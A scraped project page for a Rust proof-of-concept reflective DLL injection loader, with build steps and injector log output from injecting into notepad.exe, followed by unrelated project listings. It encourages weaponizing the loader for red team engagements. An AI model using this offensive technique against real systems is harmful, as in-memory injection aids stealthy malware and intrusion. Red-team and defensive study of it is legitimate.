Rusty Reflective DLL Injection - A small reflective loader in Rust 4KB in size

Related tags

Miscellaneous rdi-rs
Overview

Reflective Loader in Rust (4KB in size)

A small reflective loader PoC in Rust. I remade this from my old project (https://github.com/memN0ps/arsenal-rs/tree/main/rdi-rs), which is almost the same but has a smaller file size, thanks to this repo: https://github.com/johnthagen/min-sized-rust

Features

More coming soon, maybe or maybe I'll modify the Shellcode Reflective DLL Injection project to work better: https://github.com/memN0ps/srdi-rs

Example

Bring your own injector (BYOI) or the simple injector in this PoC for testing.

  1. Open notepad.exe

  2. Build the reflective_loader project in release.

PS C:\Users\developer\Documents\GitHub\rdi-rs\reflective_loader> cargo build --release
   Compiling reflective_loader v0.1.0 (C:\Users\developer\Documents\GitHub\rdi-rs\reflective_loader)
    Finished release [optimized] target(s) in 0.48s
PS C:\Users\developer\Documents\GitHub\rdi-rs\reflective_loader>
  1. Set the Powershell environment variable for debugging and cargo run
C:\Users\developer\Documents\GitHub\rdi-rs\inject> $Env:RUST_LOG="info"

PS C:\Users\developer\Documents\GitHub\rdi-rs\inject> cargo run

[2023-03-21T09:29:31Z INFO  inject] [+] Process ID: 3028
[2023-03-21T09:29:31Z INFO  inject] [+] IMAGE_DOS_HEADER: 0x7ff72e8080d0
[2023-03-21T09:29:31Z INFO  inject] [+] IMAGE_NT_HEADERS: 0x7ff72e8081a8
[2023-03-21T09:29:31Z INFO  inject] [+] Process handle: 244
[2023-03-21T09:29:31Z INFO  inject] [+] Remote allocated memory region for the dll: 0x19162c10000
[2023-03-21T09:29:31Z INFO  inject] [+] Local Reflective Loader Address/offset: 0x7ff72e8084d0
[2023-03-21T09:29:31Z INFO  inject] [+] Remote Reflective Loader Address/offset: 0x19162c10400
[2023-03-21T09:29:31Z INFO  inject] [+] entry_point: 0x19162c1151b
[2023-03-21T09:29:31Z INFO  inject] [+] Injection Completed
  1. You should see the following

poc

  1. File size

size

size

Note: This is just a PoC, and there is still some OPSEC to worry about. I'll leave that as an exercise for the user. I have included the references below for you to check out to weaponize this for red team engagements.

Credits / References / Motivation / Thanks

You might also like...
Small project that try to bend to world.

Small project that try to bend to world. May not be fully working, but should provide an improvable starting point. How to The only important file is

null 1 Nov 13, 2021
A small in-house bot of the TTC Discord Server

Welcome to The Terminal cafe Support Bot Repository Hello, hope you are having a nice day. This is the official repository for The Terminal Cafe Suppo

null 5 Jul 4, 2022
A small monitoring process that checks if kstars is active, if not it sends a request to notify a user via telegram that it crashed

Astro monitor A small monitoring process that checks if kstars is active, if not it sends a request to notify a user via telegram that it crashed Inst

Mattia Procopio 2 Jan 10, 2022
Amethyst is a systems language aimed at being simple, small, portable, and safe.

amethyst Amethyst is a systems language aimed at being simple, small, portable, and safe. What is this language? From the r/ProgLangs discord server:

Amethyst Language 34 Dec 18, 2022
A small util to brute-force prefetch hashes
A small util to brute-force prefetch hashes

Prefetch Hash Cracker Motivation During the forensic analysis of a Windows machine, you may find the name of a deleted prefetch file. While its conten

Harel Segev 69 Jul 1, 2023
First Git on Rust is reimplementation with rust in order to learn about rust, c and git.

First Git on Rust First Git on Rust is reimplementation with rust in order to learn about rust, c and git. Reference project This project refer to the

Nobkz 1 Jan 28, 2022
A stupid macro that compiles and executes Rust and spits the output directly into your Rust code

inline-rust This is a stupid macro inspired by inline-python that compiles and executes Rust and spits the output directly into your Rust code. There

William 19 Nov 29, 2022
Learn-rust - An in-depth resource to learn Rust 🦀

Learning Rust 🦀 Hello friend! 👋 Welcome to my "Learning Rust" repo, a home for my notes as I'm learning Rust. I'm structuring everything into lesson

Lazar Nikolov 7 Jan 28, 2022
Telegram bot help you to run Rust code in Telegram via Rust playground
Telegram bot help you to run Rust code in Telegram via Rust playground

RPG_BOT (Rust Playground Bot) Telegram bot help you to run Rust code in Telegram via Rust playground Bot interface The bot supports 3 straightforward

TheAwiteb 8 Dec 6, 2022
Owner
beep boop computers computers
null
GitHub
Adds size optimizations to any Perseus app automatically.

Perseus Size Optimization Plugin WARNING: Until Perseus #66 is fixed, this plugin can actually increase overall binary size! Once that issue is fixed

arctic_hen7 6 Aug 14, 2022
A highly modular Bitcoin Lightning library written in Rust. Its Rust-Lightning, not Rusty's Lightning!

Rust-Lightning is a Bitcoin Lightning library written in Rust. The main crate, lightning, does not handle networking, persistence, or any other I/O. Thus, it is runtime-agnostic, but users must implement basic networking logic, chain interactions, and disk storage. More information is available in the About section.

Lightning Dev Kit 850 Jan 3, 2023
A rusty interface to llama.cpp for rust

llama-cpp-rs Higher level API for the llama-cpp-sys library here: https://github.com/shadowmint/llama-cpp-sys/ A full end-to-end example can be found

Doug 3 Apr 16, 2023
Rusty Ray Tracer

rtrtr - Rusty Ray Tracer Cameron Christensen - Fall 2021 -- I started this both to brush up on ray tracing and to learn Rust. For the former I've been

Cameron Christensen 2 Nov 5, 2021
COINGATOR: a statistical rusty searcher 𝗶𝗻 𝗿𝘂𝘀𝘁

?? ?? COINGATOR: a statistical rusty searcher ?? ✨ (need to commit the rest of this work: i will add everything when i am back from vacation) tl; dr ?

go outside labs 4 Jan 11, 2023
Click-once - A small tiny little binary to fix undesired mouse double clicks in Windows, written in Rust.

click-once A small tiny little binary to fix malfunctioning mouse double clicks in Windows, written in Rust. Minimal executable with little to no over

null 23 Dec 29, 2022
Small Rust program for sending messages to Telegram channels.

tg-send: a small Rust program for sending Telegram messages Send messages to a group/channel via the Bot API from the command line; it's super simple

null 2 Jul 10, 2023
Shows my Spotify status on a small screen. Powered by ESP-IDF & built with 🧡 in Rust! 🦀

ESP Display A small embedded project that shows what I'm listening to on Spotify by using my Spotify service. Example Notable Features ESP32-S3 board

Isaiah Gamble 3 Apr 10, 2024
Totally Speedy Transmute (TST) is a library providing a small, performance oriented, safe version of std::mem::transmute

Totally Speedy Transmute An evil spiritual successor to Totally Safe Transmute What is it? Totally Speedy Transmute (TST) is a library providing a sma

John Schmidt 19 Jun 7, 2022
Small and simple stateful applications, designed to facilitate the monitoring of unwanted behaviors of the same.

Violet Violet é um pequeno e simples monitorador de aplicação, voltado para receber eventos de erro e estado. Instalação simples: Dependencias: Docker

Lucas Mendes Campos 3 Jun 4, 2022